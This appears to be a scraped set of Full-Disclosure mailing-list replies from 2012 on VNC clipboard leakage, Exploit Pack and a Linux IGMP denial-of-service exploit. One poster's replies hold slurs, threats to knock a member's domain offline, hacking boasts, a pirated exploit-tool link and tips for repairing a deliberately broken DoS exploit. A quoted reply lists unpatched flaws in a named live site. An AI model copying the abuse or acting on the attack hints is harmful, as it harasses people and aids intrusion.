Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
you are seriously more retarded than even the n3td3v+me+you together...damn army..! On 25 January 2012 19:29, Peter Osterberg j...@vel.nu wrote: Wasn't the original thread originally about VNC? On 01/25/2012 09:27 AM, GloW - XD wrote: derp, do you know what KVM IP is ? readup on how that relays ;) thats that. XD On 25 January 2012 18:44, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
nice to send THIS one to fd, and you ssomehow admit to knowing it here
yet, i told you what it was, exactly, dont try make me look bad fag,
or i will drop your fucking domain, for a month :)
ciao beech,.
xd
On 25 January 2012 19:55, Dan Yefimov d...@lightwave.net.ru wrote:
On 25.01.2012 5:45, Ben Bucksch wrote:
On 25.01.2012 00:52, Henri Salo wrote:
On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote:
On 25.01.2012 00:09, Dan Kaminsky wrote:
IP KVM, in which the foreign server basically gets only inbound
Keyboard and Mouse and outbound uncompressed pixels.
That is *precisely* what VNC is: an open-source IP KVM.
What the hell? Seriously..
http://en.wikipedia.org/wiki/VNC
hihi. Thanks.
It transmits the keyboard and mouse events from one computer to
another, relaying the graphical screen updates back in the other
direction, over a network.
The VNC protocol (RFB) is very simple, based on one graphic primitive
from server to client ('Put a rectangle of pixel data at the specified
X,Y position') and event messages from client to server.
Compare to above.
Now, the part where it defines that clipboard is also a standard part of
VNC... oh, huch, it's not there! (Just a random note that Unicode is
impossible, but not that clipboard is defined as part of the protocol at
all.) Ah, I know... Surely, it must be on
http://en.wikipedia.org/wiki/RFB_protocol... No, same thing there.
Strange.
It should be strictly understood that something not being mentioned in the
Wikipedia article doesn't mean that doesn't exist at all, since Wikipedia is
_not_ authoritative information source. The authoritative information source
would be the formal specification of the protocol explicitly defining the set
of
event types and explicitly prohibiting non-defined event types, otherwise
implementations are free to define and use their own event types being in fact
extensions of the protocol. It's defined nowhere that VNC is _exactly_
open-source IP KVM and nothing more.
P.S. I was just reporting bug. I hope at least some software finds a
better solution. Have fun.
I'd suggest you find alternative product allowing you to explicitly configure
that clipboard is not transmitted to the host under control instead of
struggling with the product limitations and design flaws.
--
Sincerely Yours, Dan.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
ooops my bad, wriong guy, or, you dont understand this either ?
On 25 January 2012 19:55, Dan Yefimov d...@lightwave.net.ru wrote:
On 25.01.2012 5:45, Ben Bucksch wrote:
On 25.01.2012 00:52, Henri Salo wrote:
On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote:
On 25.01.2012 00:09, Dan Kaminsky wrote:
IP KVM, in which the foreign server basically gets only inbound
Keyboard and Mouse and outbound uncompressed pixels.
That is *precisely* what VNC is: an open-source IP KVM.
What the hell? Seriously..
http://en.wikipedia.org/wiki/VNC
hihi. Thanks.
It transmits the keyboard and mouse events from one computer to
another, relaying the graphical screen updates back in the other
direction, over a network.
The VNC protocol (RFB) is very simple, based on one graphic primitive
from server to client ('Put a rectangle of pixel data at the specified
X,Y position') and event messages from client to server.
Compare to above.
Now, the part where it defines that clipboard is also a standard part of
VNC... oh, huch, it's not there! (Just a random note that Unicode is
impossible, but not that clipboard is defined as part of the protocol at
all.) Ah, I know... Surely, it must be on
http://en.wikipedia.org/wiki/RFB_protocol... No, same thing there.
Strange.
It should be strictly understood that something not being mentioned in the
Wikipedia article doesn't mean that doesn't exist at all, since Wikipedia is
_not_ authoritative information source. The authoritative information source
would be the formal specification of the protocol explicitly defining the set
of
event types and explicitly prohibiting non-defined event types, otherwise
implementations are free to define and use their own event types being in fact
extensions of the protocol. It's defined nowhere that VNC is _exactly_
open-source IP KVM and nothing more.
P.S. I was just reporting bug. I hope at least some software finds a
better solution. Have fun.
I'd suggest you find alternative product allowing you to explicitly configure
that clipboard is not transmitted to the host under control instead of
struggling with the product limitations and design flaws.
--
Sincerely Yours, Dan.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
INSECURE i mean* On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
fuckoff you ragdoll... i dont troll, and many on this fucking list knows it... fuckit... i aint paying shit to anyone on this list, enjoy finding your 0days, and, the next admins, go ahead and rm me, coz i will be dropping your ass of a FD , until it makes me. go die, and, maybe, you wont have money, and then, maybe, you will have 10 wives, with 10 kids,. now go eat a burger. rat On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote: No, I only read the manual. Now go troll somwhere else. :) On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
and stupidly, you forgot to addin the second PRIVT post i sent you, saying i meant *insecure :) now, go try tell me windows vnc is secure again...and, then setup a vnc on your box, and, under win32, try your best, when your ready, yell out, so i can make a compete fucking fool of ya. ok ? if this is how you want to play, i am challenging you, if i can own a shitty windows setup you 'secure' as best you8 can, here on fd, is this trolling is it ? its a challenge... maybe, if you read the lame rfb and, pixelisation via IP KVM, unfortunately for windows, it aint any different, a pixel is placed at X or Y, and, you can place data calls to it, from server wich, could be, my bot :) want more proof,...keep going with my challenge then. On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote: No, I only read the manual. Now go troll somwhere else. :) On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
stfu idiot.. now go look at your boxes :) and netstatsand enjoy being part of, a much nicer, smaller organisation wich is only here, to destroy you all. :) bye! oh btw, secunia,.com is also, owned. have phun! GLOW On 26 January 2012 09:19, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 25/01/2012 20:16, adam wrote: If we cared, we'd visit that site of our own volition. Secondly, even if we were interested: most of the people on these lists are intelligent enough not to click on links from spammers. Third, even if the content were interesting, even if this were the place for it and even if you hadn't spammed: pay and register is incentive enough for me *not* to join and * not* to ever visit that site again. Short version: this purpose of this list isn't for you to spam your new state-of-the-art website. Instead, it's typically to discuss/disclose issues/concepts related to computer/network security. Once in a while, there are discussions about the overflowing stupidity that some site owners/coders have. For example, people that stupidly (and blindly) inject code (e.g. for tracking purposes) into every single file on their site, regardless of extension: http://www.karmacyberintel.net/robots.txt Another one is blatantly disclosing paths in robots.txt that aren't even linked to and would never be found anyway (at least by bots that honor robots.txt, which ends up being the exact opposite of the desired effect). An example of how/why this can be a problem: md5sum of tiny_mce.js off your server is 9754385dabfc67c8b6d49ad4acba25c3, if we perform a simple Google search - we can determine that you're likely running version 3.3.1 of Wordpress. From there, we have enough information to perform a targeted attack on your server. Except, we don't need to because you've already made it more than easy enough for us. Pretty much every single field on http://www.karmacyberintel.net/pay/ is vulnerable to SQL injection, which could easily allow anyone to completely compromise the database and possibly the entire site. On top of that, register.php also allows for session fixation attacks, as a result of header/cookie manipulation. If that weren't bad enough, the admin section for your karma theme is also vulnerable to cross-site scripting. Not to mention, all the problems with with how you've configured SSL and everything else. If you're going to spam, at least make sure the website you're spamming has been tested and determined to be *somewhat* secure. Thanks for the smile. If one is not certain that ones own house is not made of glass, it's best to not throw stones. D On Tue, Jan 24, 2012 at 11:31 PM, karma cyberintel karmacyberint...@gmail.com wrote: *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTyB/77Ivn8UFHWSmAQLoYAf8CbOtPVtl7nyo+ujnkf1qeWf7hGzjU5lJ xWr8kd/N37n50u3a6PXfy9p7TC+wQ2MNoJCZ6Y02sPZ6KxlUXXOC/K8iXigFK1yh rVrNaDLSR8+WgfOdskl7mYZXvHG7n2u8p3MNOll0D9MG1vn179P/oV3JXawSyHMZ EhhWPjjiJZfNwPhPBTQnQMhg3HoWYsJKrVR5CIu/EKiAPaS2xG7l+DojADZmPsIU B9BvSqLzJoVFUQ5zVF3KzPJLqIimqgH6HmK18Nmhs/kcBaxjVRL88XcfP1bYtl/Y kg22lkaRU5IIxDviy5ztxkBERKu7SyuBjcrE6B23rBia9xeCrloMdQ== =U0gT -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DoS attacks using Exploit Pack
Hey i agree , why do you think i told the kingcope / kcope / dickhed , about putting some crap on here wich doesnt work..then lying to me about it, saying he had not readthru the code...yet, others know, it dont work... he actually cried about this and parted my channel ;( im so damn sad of this great loss... good stuff! atrleast it is able to be used to actually 'pentest' , now, try adding soem actual working explits in ok :P ehe.. On 23 January 2012 09:35, nore...@exploitpack.com wrote: DoS attacks by using Exploit Pack What is this? Exploit Pack is a next generation tool to assist you while you perform penetration testing to your workstations or servers. Make your workstation safe by testing its security. Before hackers do. Take a look of this tool while we perform a denial of service to a test site. http://www.youtube.com/watch?v=1dBa2jBu1XE Exploit Pack Team Juan Sacco Dev Lead http://exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DoS attacks using Exploit Pack
http://www.exploitpack.com/wp-includes/ btw thx DiabloHor ;) and this is leety shit :P i did expect better dude,... ffs, update or get owned! On 23 January 2012 09:35, nore...@exploitpack.com wrote: DoS attacks by using Exploit Pack What is this? Exploit Pack is a next generation tool to assist you while you perform penetration testing to your workstations or servers. Make your workstation safe by testing its security. Before hackers do. Take a look of this tool while we perform a denial of service to a test site. http://www.youtube.com/watch?v=1dBa2jBu1XE Exploit Pack Team Juan Sacco Dev Lead http://exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DoS attacks using Exploit Pack
http://exploitpack.com/download/modules/code/data/ man how leet! On 23 January 2012 09:35, nore...@exploitpack.com wrote: DoS attacks by using Exploit Pack What is this? Exploit Pack is a next generation tool to assist you while you perform penetration testing to your workstations or servers. Make your workstation safe by testing its security. Before hackers do. Take a look of this tool while we perform a denial of service to a test site. http://www.youtube.com/watch?v=1dBa2jBu1XE Exploit Pack Team Juan Sacco Dev Lead http://exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
ya just cant please em all on here :P On 21 January 2012 10:24, Gage Bystrom themadichi...@gmail.com wrote: Well I apologize if you consider a 'dns lookup' to be a buzz word. I also apologize if you are incapable of understanding intent without it being spelled out for you that I was stating what I would do if I had seen that and I suggest he do something similar. What's your problem with me being specific instead of being vague about the steps? The difference between your idiotic Hollywood script and what I actually said is that I put an ounce of thought into mine. If you have a problem with that I said then explain what's wrong with it instead of going about with an ad hominem fallacy. Speaking of contribution what the hell are you contributing with all of this? I gave some 'trite advice' as to what he could do and I framed it as what I would have done. What's so bad about that? If you can do nothing but bitch about how my advice and my phrasing makes me a horrible person than you might as well move on. I certainly know that's what I intend to do. Oh wait, you have a problem with people stating what they would do in a given situation, I'm sorry. I'll try to be more considerate next time. On Jan 20, 2012 3:10 PM, James Condron ja...@zero-internet.org.uk wrote: Yeah, you really weren't, you were telling us how you would have handled it, with all the buzzwords and terms you could have thought of. Hell, I'm surprised you didn't manage to get the word 'synergy' in there. I would do a dns lookup and then compare those results to that of a public web service, and save the links for the AVs to check if they have any malicious history associated with them. Reads like s bad Hollywood script First I would ping the phone number and see if I could telnet to the ICMP, then get the PTR of the MAC address and use an ARP overflow and spoof the TTL of the Window Size and... (etc. etc.) What are you suggesting; take a look at where the request is coming from and make a decision based on that whether the software is being punted by facebook or a third party? Fine- just say that; make your suggestion and get on with your life. Its a little trite as advice goes, but if thats all you can contribute then go for it. Coming in with your Marky-Mark talk of First I'd get the first hijacker and use his head to kill the second hijacker and then I'd be all like 'yeah, lets land the plane here- let me drive' is not very helpful On 20 Jan 2012, at 22:37, Gage Bystrom wrote: What the hell are you talking about? I was just giving some advice on how he could check if it was legit or not if it happens again. What crawled up your ass and died this morning? On Jan 20, 2012 2:21 PM, ja...@zero-internet.org.uk wrote: You should tell us what you would have done had you been on one of the hijacked sept 11 planes. Bet things would have gone down different then, amiright? Sent from my BlackBerry® wireless device -Original Message- From: Gage Bystrom themadichi...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 20 Jan 2012 13:29:01 To: Wesley Kerfootwja...@gmail.com; full-disclosure@lists.grok.org.ukfull-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Pack - New release
So anyhow... came across this... for anyone interested in it.. this is seemingly abit old but, i will actually check it out, and then make my judgement, altho, i see msf2 and, recall there was problemos, specially with the whole smb session setup and nt session stuffs, and cpl other areas, dcerpc in any form seemed abit tricky them days of msf2 when it was crossing, from i think .py or .rb to customised rb with a really GREAT Dcerpc FPhost application, so, i see that is there but, is msf2/ , so, if he riped them off, well, i guess this is not a payback atall but, finally, im going to fucking end this topic ok, so, this guy is decent, or not decent, can be for once maybe put to bloody rest, i mean, the guy is trying, albeit, he sucks, atm...but, maybe this will show more, who knows, i have seen miracles happen. http://hotfile.com/dl/142661738/73422d5/INSECTProFull.zip.html -- 122meg , unchecked,untested.. probably others of it around but, this seems workable... enjoy but, please, rate it atleast afterwards...as i will delete it after people have given the 'complete' exploitpack.com works,wich, this is also part of, so i would assume that exploitpack files should work on insectpro, or not... this is what we can now ask and, well, he can try sell it and scream Copyrght all he likes, then, i will just move it to my website, and makesure it is updated... so, i guess it is, leave it till i say, or, itll be online, free,forever, with updates :) ok. have a lovely fucking FD wank day arseholes. On 19 January 2012 06:26, nore...@exploitpack.com wrote: Exploit Pack is a Security Tool that will assist you while you test the security of your workstations or networks. With a friendly and easy to use interface, it has an update manager to keep you up to date and an IDE for develop or modify it’s modules. Also we provide you with technical support if you need it. Try it out and purchase a subscription now. Make your computer safe using Exploit pack. Make your workstation safe by testing it security before hackers do, virus or malware do. Mitigate, monitor and manage the latest security threats vulnerabilities and implement active security policies by performing penetration tests across your infrastructure and applications. Visit us: http://exploitpack.com Exploit Pack Team Juan Sacco Dev Lead ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [CVE-2012-0207] Linux IGMP Remote Denial Of Service
Try fixing the in_cksum() function, it has been intionally crippled,also,look at both of the 'ips' both should really be argvs,as theyre set in saddr/daddr;) this should be easy to fix, or read the pasted one i think is in one of my posts in reply to it, it will show where i had to adjust it, as the sendto, will never work with the in_cksum not functional, lan, or no lan... anyhow, you could ignore me, but in the end, read the code... later dude. drew On 19 January 2012 09:43, Morgus Magnificent morgusdamagnific...@gmail.com wrote: Thanks again for re-enforcing my paranoia with another one of your exploits. The apache killer one was particularly disturbing and at the same time, another great eye-opener, much respect to you. I tested this on a custom compiled kernel for PXE booting, version 2.6.37.6-x86_64, running Debian Squeeze, and I can't seem to get it to work. Root is mounted read-only over NFS. I don't recall any special config options I did for networking or IGMP requests, other then building my NIC drivers and NFS into the kernel. Did I just get lucky? Thanks, Morgus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] p0f3 release candidate
